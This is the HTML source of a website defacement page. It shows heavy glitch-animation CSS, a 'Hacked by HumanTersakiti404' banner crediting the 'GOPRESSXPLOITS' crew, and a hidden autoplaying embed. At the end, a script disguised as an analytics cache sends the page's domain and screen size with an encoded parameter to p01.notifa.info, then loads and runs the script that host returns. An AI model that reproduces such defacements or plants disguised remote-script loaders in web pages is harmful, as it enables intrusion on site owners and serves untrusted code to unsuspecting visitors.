<html>
<title> pwndz bo! </title>
<head>
<meta name="description" content="kontolatos">
<style type='text/css'>
.@-moz-keyframes glitch {
  0% {
    -moz-transform: skew(-55deg);
    transform: skew(-55deg);
  }
  5% {
    -moz-transform: skew(-52deg);
    transform: skew(-52deg);
  }
  10% {
    -moz-transform: skew(72deg);
    transform: skew(72deg);
  }
  15% {
    -moz-transform: skew(39deg);
    transform: skew(39deg);
  }
  20% {
    -moz-transform: skew(11deg);
    transform: skew(11deg);
  }
  25% {
    -moz-transform: skew(19deg);
    transform: skew(19deg);
  }
  30% {
    -moz-transform: skew(62deg);
    transform: skew(62deg);
  }
  35% {
    -moz-transform: skew(-63deg);
    transform: skew(-63deg);
  }
  40% {
    -moz-transform: skew(-61deg);
    transform: skew(-61deg);
  }
  45% {
    -moz-transform: skew(-74deg);
    transform: skew(-74deg);
  }
  50% {
    -moz-transform: skew(-53deg);
    transform: skew(-53deg);
  }
  55% {
    -moz-transform: skew(50deg);
    transform: skew(50deg);
  }
  60% {
    -moz-transform: skew(-2deg);
    transform: skew(-2deg);
  }
  65% {
    -moz-transform: skew(71deg);
    transform: skew(71deg);
  }
  70% {
    -moz-transform: skew(-65deg);
    transform: skew(-65deg);
  }
  75% {
    -moz-transform: skew(-47deg);
    transform: skew(-47deg);
  }
  80% {
    -moz-transform: skew(22deg);
    transform: skew(22deg);
  }
  85% {
    -moz-transform: skew(39deg);
    transform: skew(39deg);
  }
  90% {
    -moz-transform: skew(-42deg);
    transform: skew(-42deg);
  }
  95% {
    -moz-transform: skew(85deg);
    transform: skew(85deg);
  }
}
@-webkit-keyframes glitch {
  0% {
    -webkit-transform: skew(-73deg);
    transform: skew(-73deg);
  }
  5% {
    -webkit-transform: skew(-46deg);
    transform: skew(-46deg);
  }
  10% {
    -webkit-transform: skew(53deg);
    transform: skew(53deg);
  }
  15% {
    -webkit-transform: skew(41deg);
    transform: skew(41deg);
  }
  20% {
    -webkit-transform: skew(18deg);
    transform: skew(18deg);
  }
  25% {
    -webkit-transform: skew(63deg);
    transform: skew(63deg);
  }
  30% {
    -webkit-transform: skew(13deg);
    transform: skew(13deg);
  }
  35% {
    -webkit-transform: skew(-47deg);
    transform: skew(-47deg);
  }
  40% {
    -webkit-transform: skew(-28deg);
    transform: skew(-28deg);
  }
  45% {
    -webkit-transform: skew(-26deg);
    transform: skew(-26deg);
  }
  50% {
    -webkit-transform: skew(-49deg);
    transform: skew(-49deg);
  }
  55% {
    -webkit-transform: skew(-75deg);
    transform: skew(-75deg);
  }
  60% {
    -webkit-transform: skew(-1deg);
    transform: skew(-1deg);
  }
  65% {
    -webkit-transform: skew(0deg);
    transform: skew(0deg);
  }
  70% {
    -webkit-transform: skew(-47deg);
    transform: skew(-47deg);
  }
  75% {
    -webkit-transform: skew(5deg);
    transform: skew(5deg);
  }
  80% {
    -webkit-transform: skew(-63deg);
    transform: skew(-63deg);
  }
  85% {
    -webkit-transform: skew(18deg);
    transform: skew(18deg);
  }
  90% {
    -webkit-transform: skew(11deg);
    transform: skew(11deg);
  }
  95% {
    -webkit-transform: skew(-31deg);
    transform: skew(-31deg);
  }
}
@keyframes glitch {
  0% {
    -moz-transform: skew(-4deg);
    -ms-transform: skew(-4deg);
    -webkit-transform: skew(-4deg);
    transform: skew(-4deg);
  }
  5% {
    -moz-transform: skew(39deg);
    -ms-transform: skew(39deg);
    -webkit-transform: skew(39deg);
    transform: skew(39deg);
  }
  10% {
    -moz-transform: skew(-53deg);
    -ms-transform: skew(-53deg);
    -webkit-transform: skew(-53deg);
    transform: skew(-53deg);
  }
  15% {
    -moz-transform: skew(-34deg);
    -ms-transform: skew(-34deg);
    -webkit-transform: skew(-34deg);
    transform: skew(-34deg);
  }
  20% {
    -moz-transform: skew(6deg);
    -ms-transform: skew(6deg);
    -webkit-transform: skew(6deg);
    transform: skew(6deg);
  }
  25% {
    -moz-transform: skew(-10deg);
    -ms-transform: skew(-10deg);
    -webkit-transform: skew(-10deg);
    transform: skew(-10deg);
  }
  30% {
    -moz-transform: skew(40deg);
    -ms-transform: skew(40deg);
    -webkit-transform: skew(40deg);
    transform: skew(40deg);
  }
  35% {
    -moz-transform: skew(53deg);
    -ms-transform: skew(53deg);
    -webkit-transform: skew(53deg);
    transform: skew(53deg);
  }
  40% {
    -moz-transform: skew(-74deg);
    -ms-transform: skew(-74deg);
    -webkit-transform: skew(-74deg);
    transform: skew(-74deg);
  }
  45% {
    -moz-transform: skew(40deg);
    -ms-transform: skew(40deg);
    -webkit-transform: skew(40deg);
    transform: skew(40deg);
  }
  50% {
    -moz-transform: skew(-57deg);
    -ms-transform: skew(-57deg);
    -webkit-transform: skew(-57deg);
    transform: skew(-57deg);
  }
  55% {
    -moz-transform: skew(-88deg);
    -ms-transform: skew(-88deg);
    -webkit-transform: skew(-88deg);
    transform: skew(-88deg);
  }
  60% {
    -moz-transform: skew(19deg);
    -ms-transform: skew(19deg);
    -webkit-transform: skew(19deg);
    transform: skew(19deg);
  }
  65% {
    -moz-transform: skew(34deg);
    -ms-transform: skew(34deg);
    -webkit-transform: skew(34deg);
    transform: skew(34deg);
  }
  70% {
    -moz-transform: skew(-7deg);
    -ms-transform: skew(-7deg);
    -webkit-transform: skew(-7deg);
    transform: skew(-7deg);
  }
  75% {
    -moz-transform: skew(-79deg);
    -ms-transform: skew(-79deg);
    -webkit-transform: skew(-79deg);
    transform: skew(-79deg);
  }
  80% {
    -moz-transform: skew(-59deg);
    -ms-transform: skew(-59deg);
    -webkit-transform: skew(-59deg);
    transform: skew(-59deg);
  }
  85% {
    -moz-transform: skew(52deg);
    -ms-transform: skew(52deg);
    -webkit-transform: skew(52deg);
    transform: skew(52deg);
  }
  90% {
    -moz-transform: skew(-84deg);
    -ms-transform: skew(-84deg);
    -webkit-transform: skew(-84deg);
    transform: skew(-84deg);
  }
  95% {
    -moz-transform: skew(1deg);
    -ms-transform: skew(1deg);
    -webkit-transform: skew(1deg);
    transform: skew(1deg);
  }
}
@-moz-keyframes noise {
  0% {
    background-position: -25px 40px;
  }
  10% {
    background-position: -40px -44px;
  }
  20% {
    background-position: -57px -84px;
  }
  30% {
    background-position: 16px -12px;
  }
  40% {
    background-position: 66px 58px;
  }
  50% {
    background-position: 97px 44px;
  }
  60% {
    background-position: -17px -19px;
  }
  70% {
    background-position: 94px 34px;
  }
  80% {
    background-position: -57px 6px;
  }
  90% {
    background-position: 57px -27px;
  }
}
@-webkit-keyframes noise {
  0% {
    background-position: -15px 3px;
  }
  10% {
    background-position: -40px -65px;
  }
  20% {
    background-position: -80px -90px;
  }
  30% {
    background-position: -6px -51px;
  }
  40% {
    background-position: -29px 96px;
  }
  50% {
    background-position: 60px -84px;
  }
  60% {
    background-position: 58px -87px;
  }
  70% {
    background-position: 61px 32px;
  }
  80% {
    background-position: 72px -93px;
  }
  90% {
    background-position: 34px 58px;
  }
}
@keyframes noise {
  0% {
    background-position: 69px 38px;
  }
  10% {
    background-position: 70px -77px;
  }
  20% {
    background-position: -78px -82px;
  }
  30% {
    background-position: 85px 0px;
  }
  40% {
    background-position: 26px -11px;
  }
  50% {
    background-position: -58px 8px;
  }
  60% {
    background-position: -22px 22px;
  }
  70% {
    background-position: 35px 33px;
  }
  80% {
    background-position: 57px -40px;
  }
  90% {
    background-position: 12px -10px;
  }
}
@-moz-keyframes bar {
  0% {
    height: 118px;
    top: 27%;
    opacity: 0.67;
  }
  10% {
    height: 299px;
    top: 100%;
    opacity: 0.54;
  }
  20% {
    height: 509px;
    top: 22%;
    opacity: 0.23;
  }
  30% {
    height: 614px;
    top: 42%;
    opacity: 0.37;
  }
  40% {
    height: 364px;
    top: 21%;
    opacity: 0.79;
  }
  50% {
    height: 299px;
    top: 96%;
    opacity: 0.07;
  }
  60% {
    height: 410px;
    top: 54%;
    opacity: 0.19;
  }
  70% {
    height: 228px;
    top: 30%;
    opacity: 0.5;
  }
  80% {
    height: 520px;
    top: 98%;
    opacity: 0.6;
  }
  90% {
    height: 346px;
    top: 52%;
    opacity: 0.16;
  }
}
@-webkit-keyframes bar {
  0% {
    height: 32px;
    top: 50%;
    opacity: 0.67;
  }
  10% {
    height: 320px;
    top: 15%;
    opacity: 0.41;
  }
  20% {
    height: 516px;
    top: 97%;
    opacity: 0.52;
  }
  30% {
    height: 568px;
    top: 92%;
    opacity: 0.71;
  }
  40% {
    height: 227px;
    top: 62%;
    opacity: 0.6;
  }
  50% {
    height: 463px;
    top: 42%;
    opacity: 0.38;
  }
  60% {
    height: 244px;
    top: 24%;
    opacity: 0.57;
  }
  70% {
    height: 419px;
    top: 27%;
    opacity: 0.26;
  }
  80% {
    height: 251px;
    top: 96%;
    opacity: 0.28;
  }
  90% {
    height: 407px;
    top: 45%;
    opacity: 0.57;
  }
}
@keyframes bar {
  0% {
    height: 247px;
    top: 100%;
    opacity: 0.33;
  }
  10% {
    height: 327px;
    top: 65%;
    opacity: 0.42;
  }
  20% {
    height: 66px;
    top: 58%;
    opacity: 0.23;
  }
  30% {
    height: 239px;
    top: 22%;
    opacity: 0.63;
  }
  40% {
    height: 147px;
    top: 17%;
    opacity: 0.8;
  }
  50% {
    height: 128px;
    top: 16%;
    opacity: 0.65;
  }
  60% {
    height: 623px;
    top: 55%;
    opacity: 0.54;
  }
  70% {
    height: 458px;
    top: 87%;
    opacity: 0.52;
  }
  80% {
    height: 96px;
    top: 46%;
    opacity: 0.67;
  }
  90% {
    height: 411px;
    top: 75%;
    opacity: 0.64;
  }
}
.glitch span {
  display: inline-block;
  vertical-align: middle;
  position: relative;
  z-index: 1;
  -moz-animation: glitch 3s infinite alternate;
  -webkit-animation: glitch 3s infinite alternate;
  animation: glitch 3s infinite alternate;
}
</style>
</head>
<body bgcolor="black">
<link href='https://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<center><br>
<img src="https://wallpapercave.com/wp/yG9LkMF.jpg" width="300" height="350"><br><br>
<div class="glitch">
<span><font face="Iceland" color="white" size="7"> Hacked by HumanTersakiti404 </font></span><br><br>
</div>
<font face="Iceland" color="white" size="5"> Ling Lung Crew Reborn x GOPRESSXPLOITS Team</font><br>
<font face="Iceland" color="white" size="5"> aim for impossible, we back! </font></center>
<embed src="http://www.youtube.com/v/jELDIPJug4g&amp;autoplay=1&amp;loop=1&amp;playlist=jELDIPJug4g"
type="application/x-shockwave-flash" wmode="transparent" height="1"width="1"></embed> 
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2wUlCW%2fzsPHzibAsJUMir%2bturmM3Yx1BHODeegf6vxILFfMa0MZKHvx2OzLiOLmwu8RK9lszeQ6zyFIP6iIxuaYcMevhtrB3yv%2flkRUSrF9OTlUdRcs8f%2fXvTUMTRMX%2fNMBeiwH3vmLMHlANcbh2ymS%2bJJUJIw9MZ24P3o0QxyXNikgLUcuRDVd9KC%2fvFu7wN%2bDAP6Jmejdit2KA59X%2bFO3FJtMY5IlhuUqdgQAPDuYSg%2bzzyCUOUGEyiTUGCXRlLq7ZP5fbfsuL2x76hmxG4uAuSkJCWieUeXzKa55Egm4sBwOpmQ8HBhDeMrSuPj78%2bCZbBtp6mZIJEZiBX%2fPMYsBNX2eJ5l2Ag8%2bbWBhm7T38boE97Tst5XWxVsOAnOUoZOfnJCHj6snC5E75ioU%2fZkPpstAZGkBdvLP05I0vwyPbtISY1Rb1WErFjfWAjRjKqVDkQp8XBskeOBy33T1kXy8Y5YmzMuPztFi8RrJRSyjapeOtfl5%2bA3%2bc88TLEYhjpCv6wqQmVgS0bIWYG5xdIJGi8mx4PJxhNpS2cqeYk08Y1A5ndhmL9OKbh%2bUmtME3OIKJQl78itLQHyl8u0Melk%2brYTdnUwq%2b4" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>